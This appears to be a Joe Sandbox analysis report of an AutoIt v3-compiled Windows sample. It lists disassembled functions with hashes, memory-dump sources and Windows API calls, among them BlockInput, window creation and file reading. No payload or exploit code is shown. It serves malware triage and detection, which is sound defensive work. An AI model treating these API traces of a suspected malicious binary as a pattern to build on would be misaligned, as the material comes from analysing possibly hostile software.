Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 278df17b443851f4b187c37ae6ca925c7e5cff9bd19d797f2c5cb93d69cff45e
Instruction ID: 543133936be1ed262ed7cd6c0755604cbedc766ff25a58520e0a751a344cbe15
Opcode Fuzzy Hash: 278df17b443851f4b187c37ae6ca925c7e5cff9bd19d797f2c5cb93d69cff45e
Instruction Fuzzy Hash: A4326AB490021CDBCF14DF94CA81BFDB7B5BF44304F248469EA06AB292D775AD46DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A2676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A26766,?,?,00000008,?,?,00A2FEFE,00000000), ref: 00A26998

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 292bb2285bcfb931b446304bbca3d27e41171721e4ca0d1f9e39fac5ae1fe109
Instruction ID: d35a98f4febeede1a288c3d105feb605b371028116e6d1dad8e281195aabaa64
Opcode Fuzzy Hash: 292bb2285bcfb931b446304bbca3d27e41171721e4ca0d1f9e39fac5ae1fe109
Instruction Fuzzy Hash: 9BB159316116189FD719CF2CD48AB657BF0FF05364F2986A8E899CF2A2C735E981CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 00A4851F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 44fbc2a4f23eda6cecded7f07cbda9a3055abb00a0b0edf34fb7a2dd63412c00
Instruction ID: d404eb2910092a3537351c2af7ae58dc05853fe673524d2a6305386eed4a3621
Opcode Fuzzy Hash: 44fbc2a4f23eda6cecded7f07cbda9a3055abb00a0b0edf34fb7a2dd63412c00
Instruction Fuzzy Hash: A3127F75A102299FDB14CF58D9806EEB7F5FF48710F14819AE809EB295DB349E81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A6EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32 ref: 00A6EABD

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 576e1121ea53ad045cd47ac34237311c89f7acb33f3ac942ab116ff96f73ca9b
Instruction ID: 7bb2d41853a2b538c5e52f7ce80d59d69068e056371d67c37f11616b715dbcd3
Opcode Fuzzy Hash: 576e1121ea53ad045cd47ac34237311c89f7acb33f3ac942ab116ff96f73ca9b
Instruction Fuzzy Hash: C9E04F752002089FC710EF99D844E9AF7E9AFA87B0F408426FD49C7351DB70E8418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 00A1798B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 6f88baed240d5a902ae3de44260ace44df7ec524519ed3d6b5179737cce302bd
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 62515B7160C7455BDB388768895DBFE63FA9B02340F183509E883D7282C615DECAD356

Uniqueness

Uniqueness Score: -1.00%

Function 00A26DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8f27dbada2723bc84f22919ef29c75d6b424eb1c46d8df8da059e0fb8857dab
Instruction ID: f5be1f30aa13e515d39a2cb51cae990536f99a9e7c53a73839df147c6a6bd00a
Opcode Fuzzy Hash: f8f27dbada2723bc84f22919ef29c75d6b424eb1c46d8df8da059e0fb8857dab
Instruction Fuzzy Hash: A2324531E29F114DD7239638EC62339A649AFB73C5F15D737E81AB59A5EF28C5834200

Uniqueness

Uniqueness Score: -1.00%

Function 00A0CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f65620f21e47e2f62f9fca8b83dc86dcef3506a60983d37995500251ecb0ec21
Instruction ID: 5d03b9f64998fc0ad4c6df8819f46925e1c566569c2729a5779345f88b0b9195
Opcode Fuzzy Hash: f65620f21e47e2f62f9fca8b83dc86dcef3506a60983d37995500251ecb0ec21
Instruction Fuzzy Hash: 9A32153AA011198BEF68CF29D4D067D77B1EB85374F29866AD44E9B292E330DD81DB40

Uniqueness

Uniqueness Score: -1.00%

Function 009F7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6414cf0418ee3785e142b77d04bc0fe55183872e539a5e606dddc97f9ae08a8e
Instruction ID: f16cd8a61dc379f872dcfaf004d55aab4c98285784218c32a373c2bbeb5770b2
Opcode Fuzzy Hash: 6414cf0418ee3785e142b77d04bc0fe55183872e539a5e606dddc97f9ae08a8e
Instruction Fuzzy Hash: 1B22A070E046099FDF14CFA9D981ABEF7F6FF44300F244629E816AB291EB35A951CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009F91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ee9a02cdda60a88605c07e9e6f9ecc722dd5282fee7f57b9165cc44725b16e
Instruction ID: 8ff4a73e2b7ff511b569933cc64e18332100a3245618f7808b52add63d42dda2
Opcode Fuzzy Hash: 13ee9a02cdda60a88605c07e9e6f9ecc722dd5282fee7f57b9165cc44725b16e
Instruction Fuzzy Hash: C202A2B1E00209EFDF04DF54D981AAEB7B5FF44340F108169F9169B2D1EB35AA61CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A119B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 02d9d82f90fb0fb9dfb18dd473bb9174ae9ebff85b471aff639e18b7644e6105
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: C791407220D0A34ADB2D437A95740BEFFF15A923A231E079ED5F2CA1C1FE24D5A4D620

Uniqueness

Uniqueness Score: -1.00%

Function 00A17A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813cb4fc21a7bc36a409e746659f7b360f2740e374bd8d548b254a79fb50e36f
Instruction ID: 7b96fadbbb2974845087238f52d820eab681200a0b84f48a19e71231fe9dd4f4
Opcode Fuzzy Hash: 813cb4fc21a7bc36a409e746659f7b360f2740e374bd8d548b254a79fb50e36f
Instruction Fuzzy Hash: 1161677120C709A6DA349B288E95BFE63B9DF41780F24391AF883DB281DB159EC2C355

Uniqueness

Uniqueness Score: -1.00%

Function 00A17CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41de56e89332298c087deb9cf05b4a743d7f06c07c25bcfaac7b9780aebefed6
Instruction ID: 5ca6686502399af0231ada93d347f697d7315655dd6fe7d89c7f5db2829b2b7f
Opcode Fuzzy Hash: 41de56e89332298c087deb9cf05b4a743d7f06c07c25bcfaac7b9780aebefed6
Instruction Fuzzy Hash: 4661797520C70D57DE388B286951BFE23F89F42744F103959E883CF2C1DA16EDC28A55

Uniqueness

Uniqueness Score: -1.00%

Function 00A11706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 0b9f8ce92ddb4d02098049526e69b28cd0e1a2f755d3e72e794a39c2d153af1c
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: F18174326090A30EDB6D473E85744BEFFE15A923A131E479ED5F2CB1C1EE24D594EA20

Uniqueness

Uniqueness Score: -1.00%

Function 00A62046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b53feed1bba57ece6c6f45db7f7c553c7e42f6e62215a5a04f1d0a3aa7457e
Instruction ID: c4b699344106fa1fff7b508d2412d5a6b91a3ae8e625241dbf2a53f86f707535
Opcode Fuzzy Hash: 90b53feed1bba57ece6c6f45db7f7c553c7e42f6e62215a5a04f1d0a3aa7457e
Instruction Fuzzy Hash: 8621A8326205158BD728CF79C81277A73E5A754310F15862EE4A7C37D0DE75AD04C790

Uniqueness

Uniqueness Score: -1.00%

Function 00A72ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A72B30
DeleteObject.GDI32(00000000), ref: 00A72B43
DestroyWindow.USER32 ref: 00A72B52
GetDesktopWindow.USER32 ref: 00A72B6D
GetWindowRect.USER32(00000000), ref: 00A72B74
SetRect.USER32 ref: 00A72CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A72CB1
CreateWindowExW.USER32 ref: 00A72CF8
GetClientRect.USER32 ref: 00A72D04
CreateWindowExW.USER32 ref: 00A72D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00A72D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A72D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A72D80
GlobalLock.KERNEL32 ref: 00A72D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A72D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A72DA1
CloseHandle.KERNEL32(00000000), ref: 00A72DA8
GlobalFree.KERNEL32(00000000), ref: 00A72DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00A72DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,00A8FC38,00000000), ref: 00A72DDB
GlobalFree.KERNEL32(00000000), ref: 00A72DEB
CopyImage.USER32 ref: 00A72E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A72E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00A72E52
ShowWindow.USER32(00000004), ref: 00A7303F

Strings

AutoIt v3, xrefs: 00A72CF2
DISPLAY, xrefs: 00A72EA2
static, xrefs: 00A72D3A, 00A72E91
, xrefs: 00A72FC5

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 900597370619a5dfa81b6dee72b1970128e5f7357c21eed478a9bd63e219ae19
Instruction ID: 53ad7194d2c4d0de559134d0246124e4d22f6499b9a23a11b0662b4b65d4831e
Opcode Fuzzy Hash: 900597370619a5dfa81b6dee72b1970128e5f7357c21eed478a9bd63e219ae19
Instruction Fuzzy Hash: E4026D75600208AFDB14DFA4CC89EAE7BB9FB49724F048558F919AB2A1D774ED01CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A870D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00A8712F
GetSysColorBrush.USER32 ref: 00A87160
GetSysColor.USER32 ref: 00A8716C
SetBkColor.GDI32(?,000000FF), ref: 00A87186
SelectObject.GDI32(?,?), ref: 00A87195
InflateRect.USER32 ref: 00A871C0
GetSysColor.USER32 ref: 00A871C8
CreateSolidBrush.GDI32(00000000), ref: 00A871CF
FrameRect.USER32 ref: 00A871DE
DeleteObject.GDI32(00000000), ref: 00A871E5
InflateRect.USER32 ref: 00A87230
FillRect.USER32 ref: 00A87262
GetWindowLongW.USER32(?,000000F0), ref: 00A87284

Part of subcall function 00A873E8: GetSysColor.USER32 ref: 00A87421
Part of subcall function 00A873E8: SetTextColor.GDI32(?,?), ref: 00A87425
Part of subcall function 00A873E8: GetSysColorBrush.USER32 ref: 00A8743B
Part of subcall function 00A873E8: GetSysColor.USER32 ref: 00A87446
Part of subcall function 00A873E8: GetSysColor.USER32 ref: 00A87463
Part of subcall function 00A873E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A87471
Part of subcall function 00A873E8: SelectObject.GDI32(?,00000000), ref: 00A87482
Part of subcall function 00A873E8: SetBkColor.GDI32(?,00000000), ref: 00A8748B
Part of subcall function 00A873E8: SelectObject.GDI32(?,?), ref: 00A87498
Part of subcall function 00A873E8: InflateRect.USER32 ref: 00A874B7
Part of subcall function 00A873E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A874CE
Part of subcall function 00A873E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00A874DB

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 82d626dc56da1d1969c4e364dc5f13fae9020c71a34b758a5bb68fa9cbc6c6bd
Instruction ID: 9b3080f30486de7f0d66299c00897caf01016b6efc6cdddbf00f8a33b1d077d4
Opcode Fuzzy Hash: 82d626dc56da1d1969c4e364dc5f13fae9020c71a34b758a5bb68fa9cbc6c6bd
Instruction Fuzzy Hash: 68A16F72008301AFDB11EFA4DC48A5E7BA9FB49330F200B19F9A2961E1E775E9458F61

Uniqueness

Uniqueness Score: -1.00%

Function 00A08D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00A08E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00A46AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A46AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A46F43

Part of subcall function 00A08F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00A08FC5

SendMessageW.USER32(?,00001053), ref: 00A46F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A46F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00A46FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00A46FB7

Strings

0, xrefs: 00A46DCF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: cf88fbb6644de85dc25c4474193355720d2586a9357ecb5a2c86c7011d4d8ee2
Instruction ID: c8bea4a063da297364dce8349cf894dd382a8c2e5342692ec5945877a3e8b521
Opcode Fuzzy Hash: cf88fbb6644de85dc25c4474193355720d2586a9357ecb5a2c86c7011d4d8ee2
Instruction Fuzzy Hash: 3812BD38600211DFDB25CF24D984BAAB7F5FB86310F544469F5858B6A2CB39EC52CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00A72711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00A7273E
SystemParametersInfoW.USER32 ref: 00A7286A
SetRect.USER32 ref: 00A728A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A728B9
CreateWindowExW.USER32 ref: 00A72900
GetClientRect.USER32 ref: 00A7290C
CreateWindowExW.USER32 ref: 00A72955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A72964
GetStockObject.GDI32(00000011), ref: 00A72974
SelectObject.GDI32(00000000,00000000), ref: 00A72978
GetTextFaceW.GDI32(00000000,00000040,?), ref: 00A72988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A72991
DeleteDC.GDI32(00000000), ref: 00A7299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A729C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 00A729DD
CreateWindowExW.USER32 ref: 00A72A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A72A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00A72A42
CreateWindowExW.USER32 ref: 00A72A77
GetStockObject.GDI32(00000011), ref: 00A72A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A72A8D
ShowWindow.USER32(00000004), ref: 00A72A97

Strings

AutoIt v3, xrefs: 00A728F8
DISPLAY, xrefs: 00A7295A
msctls_progress32, xrefs: 00A72A13
static, xrefs: 00A7294F, 00A72A71

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
